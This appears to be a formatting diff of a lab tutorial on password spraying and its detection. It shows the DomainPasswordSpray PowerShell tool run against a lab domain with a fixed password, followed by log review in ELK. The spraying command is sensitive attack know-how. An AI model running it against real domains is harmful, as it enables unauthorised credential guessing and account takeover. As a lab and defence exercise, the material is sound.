Password Spraying Attack & Defense

 Import-Module .\DomainPasswordSpray.ps1

-After installing the tool, let's proceed to execute the attack against the domain Main.local.
+After installing the tool, let's proceed to execute the attack against the domain **`Main.local`**.

-Invoke-DomainPasswordSpray -Password Admin123! -UserList .\users.txt -Domain Main.local -Force
+<pre class="language-powershell"><code class="lang-powershell"><strong>Invoke-DomainPasswordSpray -Password Admin123! -UserList .\users.txt -Domain Main.local -Force

 Before analyzing the logs in ELK, let's first review the events that occurred from PowerShell.